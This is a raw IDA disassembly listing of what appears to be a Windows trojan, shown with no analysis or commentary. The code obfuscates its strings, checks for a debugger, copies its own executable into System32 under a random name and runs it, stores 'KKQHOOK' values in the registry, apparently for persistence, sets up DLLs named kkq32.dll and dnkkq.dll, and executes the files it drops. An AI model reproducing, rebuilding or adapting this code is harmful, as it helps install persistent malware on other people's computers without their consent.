lea eax, [ebp+var_35BB]
push eax
lea eax, [ebp+var_600]
push eax
call sub_408A3D
add esp, 18h
call sub_40C998 ; GetProcessHeap
mov [ebp+var_15BE], 0
lea edi, [ebp+var_35C0]
lea esi, aPPd ; "P Pd"
mov ecx, 5
rep movsb
mov [ebp+var_15BD], 0
jmp short loc_409EBA
; ---------------------------------------------------------------------------
loc_409E9C: ; CODE XREF: sub_409A96+43D�j
movzx eax, [ebp+var_15BD]
lea edx, [ebp+eax+var_25BC]
movsx ecx, byte ptr [edx]
sub ecx, eax
mov eax, ecx
mov [edx], al
add [ebp+var_15BD], 1
loc_409EBA: ; CODE XREF: sub_409A96+404�j
lea ecx, [ebp+var_25BC]
or eax, 0FFFFFFFFh
loc_409EC3: ; CODE XREF: sub_409A96+432�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409EC3
movzx esi, [ebp+var_15BD]
cmp esi, eax
jb short loc_409E9C
lea ecx, [ebp+var_25BC]
or eax, 0FFFFFFFFh
loc_409EDE: ; CODE XREF: sub_409A96+44D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409EDE
lea esi, [ebp+var_35BB]
push esi
push eax
lea edi, [ebp+var_25BC]
push edi
call sub_408896
add esp, 0Ch
mov [ebp+var_35C4], eax
call sub_40C9C8 ; GetTickCount
push 5
push offset aC ; "×"
call sub_40129C
add esp, 8
mov edi, 3
sub edi, dword_43C094
push edi
push eax
lea edi, [ebp+var_25BC]
push edi
call sub_401883
add esp, 0Ch
cmp eax, 0
jnz loc_40A4A6
mov [ebp+var_46DE], 1DFCh
movzx eax, [ebp+var_46DE]
imul eax, 16C6h
mov [ebp+var_46DE], ax
mov eax, dword_446A04
mov [ebp+var_4700], eax
call sub_40C998 ; GetProcessHeap
lea eax, [ebp+var_25B7]
push eax
lea eax, [ebp+var_45C7]
push eax
call sub_40C8DC
mov [ebp+var_46E0], 0C3h
add [ebp+var_46E0], 0C24h
mov [ebp+var_35C8], 0
mov [ebp+var_46CC], 4
call sub_40C9C8 ; GetTickCount
lea eax, [ebp+var_46DC]
push eax
lea eax, [ebp+var_46CC]
push eax
lea eax, [ebp+var_35C8]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014CB
add esp, 18h
mov ax, word_446A08
mov [ebp+var_4702], ax
mov eax, 13h
sub eax, dword_43C098
push eax
lea eax, [ebp+var_703]
push eax
call sub_401777
add esp, 8
mov [ebp+var_46CE], 4102h
movzx eax, [ebp+var_46CE]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_46CE], ax
push 9
push offset aTItS ; "ę"
call sub_40129C
add esp, 8
lea edi, [ebp+var_703]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CE54
add esp, 10h
call sub_40CA58 ; IsDebuggerPresent
push 1
push offset asc_446D20 ; ""
call sub_40129C
add esp, 8
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_45C7]
push edi
push offset dword_41FC40
call sub_4063C4
add esp, 20h
mov ebx, eax
lea edi, [ebp+var_4705]
lea esi, word_446A0A
mov ecx, 3
rep movsb
cmp ebx, 0
jnz short loc_40A0B2
call sub_40C9C8 ; GetTickCount
lea eax, [ebp+var_400]
push eax
call sub_4035A5
add esp, 4
jmp short loc_40A0EA
; ---------------------------------------------------------------------------
loc_40A0B2: ; CODE XREF: sub_409A96+604�j
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401614
call sub_40C938 ; GetCurrentProcessId
lea eax, [ebp+var_400]
push eax
call sub_4035A5
add esp, 1Ch
call sub_40C944 ; GetCurrentThreadId
loc_40A0EA: ; CODE XREF: sub_409A96+61A�j
and [ebp+var_35C8], 0
mov [ebp+var_46CC], 4
mov [ebp+var_46E2], 6C0Eh
sub [ebp+var_46E2], 198h
lea eax, [ebp+var_46DC]
push eax
lea eax, [ebp+var_46CC]
push eax
lea eax, [ebp+var_35C8]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014CB
add esp, 18h
call sub_40CA58 ; IsDebuggerPresent
push 0
push 0
push 4
push 0
push 0
push 80000000h
push offset dword_40E070
call sub_40CAD0 ; CreateFileA
mov [ebp+var_46D4], eax
call sub_40C9D4 ; GetVersion
push 0
push [ebp+var_46D4]
call sub_40C950 ; GetFileSize
mov [ebp+var_46FC], eax
lea edi, [ebp+var_4708]
lea esi, byte_446A0D
mov ecx, 3
rep movsb
push [ebp+var_46D4]
call sub_40C9B0 ; CloseHandle
mov eax, [ebp+var_46FC]
cmp [ebp+var_35C8], eax
jb short loc_40A1BA
mov [ebp+var_4738], 2713h
sub [ebp+var_4738], 10FAh
jmp loc_40A2F5
; ---------------------------------------------------------------------------
loc_40A1BA: ; CODE XREF: sub_409A96+709�j
mov eax, 13h
sub eax, dword_43C098
push eax
lea eax, [ebp+var_46C6]
push eax
call sub_401777
lea edi, [ebp+var_4710]
lea esi, aNS6r ; "N s6r<`"
movsd
movsd
push 9
push offset aTItS_0 ; "ę"
call sub_40129C
lea edi, [ebp+var_46C6]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CE54
mov [ebp+var_46E8], 48D5h
add [ebp+var_46E8], 2096h
lea eax, [ebp+var_400]
push eax
call sub_403530
push 1
push offset asc_446D20 ; ""
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35C8]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_45C7]
push edi
push offset dword_40E070
call sub_4063C4
mov ebx, eax
lea edi, [ebp+var_4718]
lea esi, aWxRcnn ; "WX!rcNN"
mov ecx, 2
rep movsd
lea eax, [ebp+var_400]
push eax
call sub_40C908 ; DeleteFileA
lea edi, [ebp+var_471E]
lea esi, aFldF ; "FLd^F"
mov ecx, 3
rep movsw
lea eax, [ebp+var_400]
push eax
call sub_4035A5
add esp, 50h
mov [ebp+var_46EC], 1B47h
inc [ebp+var_46EC]
or ebx, ebx
jz short loc_40A2F5
mov [ebp+var_4738], 6B4Ch
add [ebp+var_4738], 71EBh
cmp [ebp+var_604], 0
jz short loc_40A2F5
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401614
add esp, 18h
loc_40A2F5: ; CODE XREF: sub_409A96+71F�j
; sub_409A96+81E�j ...
push 0
push 80h
push 3
push 0
push 0
push 80000000h
push offset dword_414DF0
call sub_40CAD0 ; CreateFileA
mov [ebp+var_46D8], eax
call sub_40C938 ; GetCurrentProcessId
cmp [ebp+var_46D8], 0FFFFFFFFh
jz loc_40AA0B
lea edi, [ebp+var_471F]
lea esi, byte_446A26
xor ecx, ecx
inc ecx
rep movsb
push [ebp+var_46D8]
call sub_40C9B0 ; CloseHandle
mov [ebp+var_46EE], 1EF4h
inc [ebp+var_46EE]
lea eax, [ebp+var_45C7]
push eax
lea eax, [ebp+var_F08]
push eax
call sub_40CE54
push 6
push offset aIKe ; "NJ"
call sub_40129C
push eax
lea edi, [ebp+var_F08]
push edi
call sub_40CE78
mov [ebp+var_46F4], 48C0h
sub [ebp+var_46F4], 61A6h
lea eax, [ebp+var_400]
push eax
call sub_403530
mov [ebp+var_46F8], 2203h
add [ebp+var_46F8], 2F45h
mov eax, dword_43C094
add eax, 6
push eax
lea eax, [ebp+var_46C6]
push eax
call sub_401777
lea edi, [ebp+var_4724]
lea esi, aAgwb ; "AGwB"
mov ecx, 5
rep movsb
push 9
push offset aTItS ; "ę"
call sub_40129C
lea edi, [ebp+var_46C6]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CE54
call sub_40CA58 ; IsDebuggerPresent
push 1
push offset asc_446D20 ; ""
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35C8]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_F08]
push edi
push offset dword_414DF0
call sub_4063C4
mov ebx, eax
call sub_40C944 ; GetCurrentThreadId
lea eax, [ebp+var_400]
push eax
call sub_40C908 ; DeleteFileA
lea edi, [ebp+var_472C]
lea esi, aMmv9nnh ; "MM9NNH"
movsd
movsd
lea eax, [ebp+var_400]
push eax
call sub_4035A5
add esp, 68h
lea edi, [ebp+var_4731]
lea esi, aYZh ; "y+Zh"
mov ecx, 5
rep movsb
or ebx, ebx
jz short loc_40A4A6
call sub_40C968 ; RtlGetLastWin32Error
push offset dword_414DF0
call sub_40C908 ; DeleteFileA
mov [ebp+var_4738], 4C88h
inc [ebp+var_4738]
loc_40A4A6: ; CODE XREF: sub_409A96+49F�j
; sub_409A96+9EF�j
cmp [ebp+var_25BC], 3Ah
jnz loc_40A657
cmp [ebp+var_25B9], 3Ah
jnz loc_40A657
call sub_40C944 ; GetCurrentThreadId
call sub_40C938 ; GetCurrentProcessId
mov [ebp+var_25B9], 0
push 5
push offset aNtze ; ""
call sub_40129C
lea edi, [ebp+var_35C8]
push edi
push eax
lea edi, [ebp+var_25BC]
push edi
call sub_40CE6C
add esp, 14h
call sub_40C9C8 ; GetTickCount
cmp [ebp+var_35C8], 0
jz short loc_40A52B
call sub_40CE3C
mov edx, 621B97C3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
inc edi
cmp edi, [ebp+var_35C8]
ja loc_40A9D2
loc_40A52B: ; CODE XREF: sub_409A96+A6A�j
call sub_40C968 ; RtlGetLastWin32Error
cmp ds:dword_4195D0, 2
jnz short loc_40A593
mov eax, dword_446A39
mov [ebp+var_35CE], eax
push 400h
lea eax, [ebp+var_400]
push eax
call sub_40C9A4 ; GetSystemDirectoryA
push 0Ah
push offset aTIS ; "ә"
call sub_40129C
lea edi, [ebp+var_400]
push edi
push eax
lea edi, [ebp+var_1010]
push edi
call sub_40CE54
push 8
push offset aIS ; "ә"
call sub_40129C
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CE78
add esp, 24h
jmp short loc_40A5FE
; ---------------------------------------------------------------------------
loc_40A593: ; CODE XREF: sub_409A96+AA1�j
call sub_40C998 ; GetProcessHeap
push 400h
lea eax, [ebp+var_400]
push eax
call sub_40C9F8 ; GetWindowsDirectoryA
lea edi, [ebp+var_35D0]
lea esi, aYq2y ; "yq:2y"
mov ecx, 3
rep movsw
push 0Eh
push offset aTIS_0 ; "ә"
call sub_40129C
lea edi, [ebp+var_400]
push edi
push eax
lea edi, [ebp+var_1010]
push edi
call sub_40CE54
call sub_40C9D4 ; GetVersion
push 0Ch
push offset aIS_0 ; "ә"
call sub_40129C
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CE78
add esp, 24h
loc_40A5FE: ; CODE XREF: sub_409A96+AFB�j
lea eax, [ebp+var_1010]
push eax
call sub_40C908 ; DeleteFileA
push 8
push offset word_446CCA
call sub_40129C
lea edi, [ebp+var_25BC]
add edi, 4
push edi
lea edi, [ebp+var_400]
push edi
push eax
lea edi, [ebp+var_400]
push edi
call sub_40CE54
add esp, 18h
mov ax, word_446A43
mov [ebp+var_35CA], ax
push 0
lea eax, [ebp+var_400]
push eax
call sub_40CB3C ; WinExec
call sub_40C9D4 ; GetVersion
loc_40A657: ; CODE XREF: sub_409A96+A17�j
; sub_409A96+A24�j
push 5
push offset aC_0 ; "ӗ"
call sub_40129C
mov edi, 3
sub edi, dword_43C094
push edi
push eax
lea edi, [ebp+var_25BC]
push edi
call sub_401883
add esp, 14h
or eax, eax
jnz loc_40A7C1
lea edi, [ebp+var_55CD]
lea esi, aTAsj ; "t ASJ,%"
movsd
movsd
call sub_40C998 ; GetProcessHeap
lea edi, [ebp+var_55D4]
lea esi, aOat? ; "|oat*?"
mov ecx, 7
rep movsb
mov eax, 12h
sub eax, dword_43C098
push eax
lea eax, [ebp+var_703]
push eax
call sub_401777
mov [ebp+var_55C4], 3303h
sub [ebp+var_55C4], 3306h
push 9
push offset aTItS ; "ę"
call sub_40129C
lea edi, [ebp+var_703]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_45C3]
push edi
call sub_40CE54
lea eax, [ebp+var_25B7]
push eax
lea eax, [ebp+var_55C2]
push eax
call sub_40C8DC
mov [ebp+var_55C5], 92h
add [ebp+var_55C5], 3Fh
push 3
push offset aE_0 ; "Ӆ"
call sub_40129C
mov [ebp+var_55D8], eax
push 1
push offset asc_446D20 ; ""
call sub_40129C
push 0
push 0
push 0
push eax
mov edi, [ebp+var_55D8]
push edi
lea edi, [ebp+var_45C3]
push edi
lea edi, [ebp+var_55C2]
push edi
push 0
call sub_4063C4
add esp, 50h
mov ebx, eax
call sub_40C9D4 ; GetVersion
cmp ebx, 2
jnz short loc_40A7C1
call sub_40C9D4 ; GetVersion
push 0
lea eax, [ebp+var_45C3]
push eax
call sub_40CB3C ; WinExec
push 6
push offset asc_446CB9 ; ""
call sub_40129C
mov edi, 0Ch
sub edi, dword_43C098
push edi
push eax
lea edi, [ebp+var_55C2]
push edi
call sub_401883
add esp, 14h
cmp eax, 0FFFFh
jz short loc_40A7C1
mov eax, 3
sub eax, dword_43C094
push eax
call sub_40CE00
pop ecx
loc_40A7C1: ; CODE XREF: sub_409A96+BEB�j
; sub_409A96+CD5�j ...
push 5
push offset aC_1 ; "ė"
call sub_40129C
mov edi, 3
sub edi, dword_43C094
push edi
push eax
lea edi, [ebp+var_25BC]
push edi
call sub_401883
add esp, 14h
or eax, eax
jnz loc_40A9D2
mov word ptr [ebp+var_55D8+2], 5555h
movzx eax, word ptr [ebp+var_55D8+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_55D8+2], ax
call sub_40C9D4 ; GetVersion
push 0
push 0
push 2
push 0
push 0
push 40000000h
push offset dword_41E9B0
call sub_40CAD0 ; CreateFileA
mov [ebp+var_45D4], eax
push 6
push offset aLI ; "ۉ"
call sub_40129C
add esp, 8
push 0
lea edi, [ebp+var_55E4]
push edi
mov edi, 11h
sub edi, dword_43C098
push edi
push eax
push [ebp+var_45D4]
call sub_40CB48 ; WriteFile
lea eax, [ebp+var_25B7]
push eax
lea eax, [ebp+var_45C7]
push eax
call sub_40C8DC
lea ecx, [ebp+var_45C7]
or eax, 0FFFFFFFFh
loc_40A87E: ; CODE XREF: sub_409A96+DED�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40A87E
mov [ebp+var_45CC], eax
mov [ebp+var_55E6], 66C3h
inc [ebp+var_55E6]
mov [ebp+var_35C8], 0
jmp short loc_40A8CB
; ---------------------------------------------------------------------------
loc_40A8A7: ; CODE XREF: sub_409A96+E41�j
mov eax, [ebp+var_35C8]
cmp [ebp+eax+var_45C7], 7Ch
jnz short loc_40A8C5
mov eax, [ebp+var_35C8]
mov [ebp+eax+var_45C7], 0
loc_40A8C5: ; CODE XREF: sub_409A96+E1F�j
inc [ebp+var_35C8]
loc_40A8CB: ; CODE XREF: sub_409A96+E0F�j
mov eax, [ebp+var_45CC]
cmp [ebp+var_35C8], eax
jb short loc_40A8A7
call sub_40C944 ; GetCurrentThreadId
and [ebp+var_45D0], 0
loc_40A8E5: ; CODE XREF: sub_409A96+F0C�j
push 1Fh
push offset aLCKNsstIlsI ; "җԊǍĉ҉"
call sub_40129C
mov edi, [ebp+var_45D0]
lea edi, [ebp+edi+var_45C7]
push edi
push eax
lea edi, [ebp+var_55D3]
push edi
call sub_40CE54
add esp, 14h
mov [ebp+var_55EC], 888h
inc [ebp+var_55EC]
lea ecx, [ebp+var_55D3]
or eax, 0FFFFFFFFh
loc_40A928: ; CODE XREF: sub_409A96+E97�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40A928
push 0
lea esi, [ebp+var_55E4]
push esi
push eax
lea edi, [ebp+var_55D3]
push edi
push [ebp+var_45D4]
call sub_40CB48 ; WriteFile
mov eax, [ebp+var_45D0]
mov [ebp+var_55F0], eax
lea ecx, [ebp+eax+var_45C7]
or eax, 0FFFFFFFFh
loc_40A961: ; CODE XREF: sub_409A96+ED0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40A961
mov esi, [ebp+var_55F0]
add esi, eax
mov [ebp+var_45D0], esi
mov [ebp+var_55DC], 4054h
mov eax, [ebp+var_55DC]
mov edx, eax
add edx, eax
mov [ebp+var_55DC], edx
inc [ebp+var_45D0]
mov eax, [ebp+var_45CC]
cmp [ebp+var_45D0], eax
jb loc_40A8E5
mov [ebp+var_55DD], 0FEh
movzx eax, [ebp+var_55DD]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_55DD], al
push [ebp+var_45D4]
call sub_40C9B0 ; CloseHandle
call sub_40C938 ; GetCurrentProcessId
loc_40A9D2: ; CODE XREF: sub_409A96+365�j
; sub_409A96+376�j ...
lea eax, [ebp+var_600]
push eax
push [ebp+var_708]
push [ebp+var_F0C]
call sub_401C68
add esp, 0Ch
mov [ebp+var_708], eax
or eax, eax
jnz loc_409E00
push [ebp+var_F0C]
call sub_40CA88 ; LocalFree
call sub_40C9D4 ; GetVersion
loc_40AA0B: ; CODE XREF: sub_409A96+2C5�j
; sub_409A96+335�j ...
call sub_408C17
lea edi, [ebp+var_115F]
lea esi, a36 ; "/36,"
mov ecx, 5
rep movsb
fld dbl_446C84
fimul dword_43C0B8
mov edi, eax
call sub_40C834
xchg eax, edi
push edi
call sub_40CDF4
mov edi, dword_43C0BC
sub edi, eax
inc edi
mov [ebp+var_1014], edi
mov eax, edi
mov [ebp-15C0h], eax
push eax
call sub_40CDF4
add esp, 8
mov edi, [ebp-15C0h]
add edi, eax
mov [ebp+var_1014], edi
lea edi, [ebp+var_1164]
lea esi, aYeJ ; "yE J"
mov ecx, 5
rep movsb
mov eax, [ebp+var_1014]
mov edi, dword_43C0BC
sub edi, dword_43C0B8
mov ecx, edi
inc ecx
xor edx, edx
div ecx
mov [ebp+var_15C4], eax
mov [ebp+var_1014], eax
call sub_40C9D4 ; GetVersion
call sub_40CE3C
mov [ebp+var_15C8], eax
mov eax, dword_43C0B8
mov edx, 66666667h
push ecx
mov ecx, eax
imul edx
sar edx, 1
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
lea edi, [eax+eax*4]
mov esi, [ebp+var_1014]
mov edx, [ebp+var_15C8]
mov eax, esi
imul eax, [ebp+var_15C8]
mov ecx, 0Ah
cdq
idiv ecx
lea edi, [edi+edx+5]
mov dword_43C0B8, edi
call sub_40C9C8 ; GetTickCount
mov eax, dword_43C0BC
cmp dword_43C0B8, eax
jbe short loc_40AB0F
and dword_43C0B8, 0
loc_40AB0F: ; CODE XREF: sub_409A96+1070�j
call sub_40C9D4 ; GetVersion
push 30D40h
call sub_40CDDC
pop ecx
jmp loc_409B01
sub_409A96 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB2B proc near ; CODE XREF: sub_40AB84+1F�p
var_6 = word ptr -6
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push eax
push edi
call sub_40CA58 ; IsDebuggerPresent
call sub_40C938 ; GetCurrentProcessId
push offset aKkqhook_30 ; "KKQHOOK_30"
push 0
push 1F0001h
call sub_40CA94 ; OpenMutexA
mov [ebp+var_4], eax
or eax, eax
jz short loc_40AB81
call sub_40C938 ; GetCurrentProcessId
push [ebp+var_4]
call sub_40C9B0 ; CloseHandle
call sub_40C938 ; GetCurrentProcessId
mov eax, 0Ch
sub eax, dword_43C098
push eax
call sub_40CE00
pop ecx
mov [ebp+var_6], 4688h
inc [ebp+var_6]
loc_40AB81: ; CODE XREF: sub_40AB2B+26�j
pop edi
leave
retn
sub_40AB2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB84 proc near ; CODE XREF: sub_40C858+5C�p
var_7CC = dword ptr -7CCh
var_7C8 = dword ptr -7C8h
var_7C2 = byte ptr -7C2h
var_7C1 = byte ptr -7C1h
var_7C0 = dword ptr -7C0h
var_7BC = dword ptr -7BCh
var_7B8 = byte ptr -7B8h
var_7B2 = byte ptr -7B2h
var_7AA = byte ptr -7AAh
var_7A2 = byte ptr -7A2h
var_79F = byte ptr -79Fh
var_799 = byte ptr -799h
var_798 = byte ptr -798h
var_790 = dword ptr -790h
var_78C = byte ptr -78Ch
var_784 = byte ptr -784h
var_77D = byte ptr -77Dh
var_775 = dword ptr -775h
var_771 = byte ptr -771h
var_76A = byte ptr -76Ah
var_66B = byte ptr -66Bh
var_56C = byte ptr -56Ch
var_468 = dword ptr -468h
var_464 = dword ptr -464h
var_460 = byte ptr -460h
var_35C = dword ptr -35Ch
var_357 = byte ptr -357h
var_356 = word ptr -356h
var_354 = dword ptr -354h
var_350 = dword ptr -350h
var_34A = byte ptr -34Ah
var_2E6 = byte ptr -2E6h
var_282 = word ptr -282h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_275 = byte ptr -275h
var_274 = word ptr -274h
var_272 = byte ptr -272h
var_271 = byte ptr -271h
var_270 = word ptr -270h
var_26E = byte ptr -26Eh
var_16A = word ptr -16Ah
var_168 = dword ptr -168h
var_162 = byte ptr -162h
var_5E = byte ptr -5Eh
var_5D = byte ptr -5Dh
var_5C = dword ptr -5Ch
var_55 = dword ptr -55h
var_51 = dword ptr -51h
var_4D = dword ptr -4Dh
var_49 = dword ptr -49h
var_45 = dword ptr -45h
var_41 = dword ptr -41h
var_3D = dword ptr -3Dh
var_39 = dword ptr -39h
var_35 = dword ptr -35h
var_31 = dword ptr -31h
var_2D = byte ptr -2Dh
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_1D = byte ptr -1Dh
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7CCh
push ebx
push esi
push edi
lea edi, [ebp+var_771]
lea esi, a2F ; "2! f <"
mov ecx, 7
rep movsb
call sub_40AB2B
call sub_40C938 ; GetCurrentProcessId
mov eax, dword_446A65
mov [ebp+var_775], eax
push 104h
lea eax, [ebp+var_162]
push eax
call sub_40C9A4 ; GetSystemDirectoryA
call sub_40C9C8 ; GetTickCount
push 13h
push offset aIIS ; "ә"
call sub_40129C
push eax
lea edi, [ebp+var_162]
push edi
call sub_40CE78
add esp, 10h
call sub_40C9C8 ; GetTickCount
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_162]
push eax
call sub_40CAD0 ; CreateFileA
mov [ebp+var_35C], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40AC1C
call sub_408585
jmp short loc_40AC27
; ---------------------------------------------------------------------------
loc_40AC1C: ; CODE XREF: sub_40AB84+8F�j
push [ebp+var_35C]
call sub_40C9B0 ; CloseHandle
loc_40AC27: ; CODE XREF: sub_40AB84+96�j
mov [ebp+var_168], 5B91h
mov eax, 1A91h
mul [ebp+var_168]
mov [ebp+var_7BC], eax
mov [ebp+var_168], eax
push 9
push offset asc_446C61 ; ""
call sub_40129C
push eax
call sub_40CA04 ; GlobalAddAtomA
mov [ebp+var_5D], 41h
movzx eax, [ebp+var_5D]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5D], al
mov eax, [ebp+arg_0]
mov ds:dword_41E9AC, eax
mov ds:dword_4195C0, 94h
push offset dword_4195C0
call sub_40C9E0 ; GetVersionExA
lea edi, [ebp+var_77D]
lea esi, a@63M ; "@63!m/#"
movsd
movsd
push 0FFh
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
call sub_40C9A4 ; GetSystemDirectoryA
mov [ebp+var_16A], 3DFFh
sub [ebp+var_16A], 0F2Dh
call sub_40C9C8 ; GetTickCount
push eax
call sub_40CE60
call sub_40C9C8 ; GetTickCount
push 104h
lea eax, [ebp+var_460]
push eax
push [ebp+arg_0]
call sub_40C974 ; GetModuleFileNameA
call sub_40C9D4 ; GetVersion
and [ebp+var_5C], 0
mov [ebp+var_464], 4
lea edi, [ebp+var_78C]
lea esi, a@7sHkf ; "@7s hKf"
mov ecx, 2
rep movsd
lea eax, [ebp+var_784]
push eax
lea eax, [ebp+var_464]
push eax
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014CB
add esp, 24h
mov [ebp+var_468], eax
call sub_40C998 ; GetProcessHeap
cmp [ebp+var_468], 0
jz short loc_40AD7D
call sub_40C938 ; GetCurrentProcessId
cmp [ebp+var_5C], 1Eh
jbe short loc_40AD5A
mov eax, 0Ch
sub eax, dword_43C098
push eax
call sub_40CE00
pop ecx
loc_40AD5A: ; CODE XREF: sub_40AB84+1C2�j
call sub_40C938 ; GetCurrentProcessId
cmp [ebp+var_5C], 1Eh
jz loc_40AEE4
lea edi, [ebp+var_7C2]
lea esi, a2A ; "2=$-a"
mov ecx, 3
rep movsw
loc_40AD7D: ; CODE XREF: sub_40AB84+1B7�j
mov eax, dword_446A7F
mov [ebp+var_790], eax
lea edi, [ebp+var_798]
lea esi, aNpy4 ; " NPy4/#"
movsd
movsd
call sub_40CE3C
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_2D], dl
mov [ebp+var_270], 5505h
sub [ebp+var_270], 57EEh
mov [ebp+var_1], 1
jmp short loc_40ADFF
; ---------------------------------------------------------------------------
loc_40ADD2: ; CODE XREF: sub_40AB84+280�j
call sub_40CE3C
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_2D], dl
add [ebp+var_1], 1
loc_40ADFF: ; CODE XREF: sub_40AB84+24C�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_40ADD2
lea edi, [ebp+var_799]
lea esi, byte_446A8B
xor ecx, ecx
inc ecx
rep movsb
mov [ebp+var_25], 0
call sub_40CE3C
mov edx, eax
test dl, 1
jnz short loc_40AE47
lea edi, [ebp+var_7C1]
lea esi, a8s ; "%8s "
mov ecx, 5
rep movsb
mov [ebp+var_27], 33h
call sub_40C968 ; RtlGetLastWin32Error
mov [ebp+var_26], 32h
loc_40AE47: ; CODE XREF: sub_40AB84+2A1�j
push 9
push offset aTItS_1 ; "ę"
call sub_40129C
lea edi, [ebp+var_2D]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_26E]
push edi
call sub_40CE54
push 0
lea eax, [ebp+var_26E]
push eax
lea eax, [ebp+var_460]
push eax
call sub_40CA70 ; CopyFileA
mov [ebp+var_271], 5Ch
add [ebp+var_271], 0C9h
lea eax, [ebp+var_2D]
push eax
call sub_403D2D
call sub_40CA58 ; IsDebuggerPresent
mov [ebp+var_5C], 1Eh
push 4
push 4
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401614
add esp, 34h
push 0
lea eax, [ebp+var_26E]
push eax
call sub_40CB3C ; WinExec
call sub_4041FC
mov eax, 3
sub eax, dword_43C094
push eax
call sub_40C914 ; ExitProcess
loc_40AEE4: ; CODE XREF: sub_40AB84+1DF�j
push 5
push offset aTIt ; ""
call sub_40129C
push offset aKkq32_dll ; "kkq32.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
push offset dword_41FC40
call sub_40CE54
mov [ebp+var_272], 0A7h
sub [ebp+var_272], 65h
push 5
push offset aTIt ; ""
call sub_40129C
push offset aDnkkq_dll ; "dnkkq.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
push offset dword_40F270
call sub_40CE54
mov [ebp+var_274], 2AE3h
add [ebp+var_274], 863h
push 5
push offset aTIt ; ""
call sub_40129C
push offset aDatkkq32_dll ; "datkkq32.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
push offset dword_40E070
call sub_40CE54
mov [ebp+var_275], 2
add [ebp+var_275], 1
push 0Eh
push offset aTIS_1 ; ""
call sub_40129C
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
push offset dword_41E9B0
call sub_40CE54
call sub_40CA58 ; IsDebuggerPresent
push 0FFh
push offset dword_414DF0
call sub_40C9F8 ; GetWindowsDirectoryA
mov [ebp+var_5E], 0D0h
movzx eax, [ebp+var_5E]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5E], al
push 9
push offset aIS_1 ; "Ù"
call sub_40129C
push eax
push offset dword_414DF0
call sub_40CE78
mov [ebp+var_27C], 5F69h
mov eax, 686h
mul [ebp+var_27C]
mov [ebp+var_7C0], eax
mov [ebp+var_27C], eax
lea eax, aKkqhook ; "KKQHOOK"
mov [ebp+var_31], eax
mov [ebp+var_280], 58Dh
sub [ebp+var_280], 3802h
mov eax, ds:dword_41E9AC
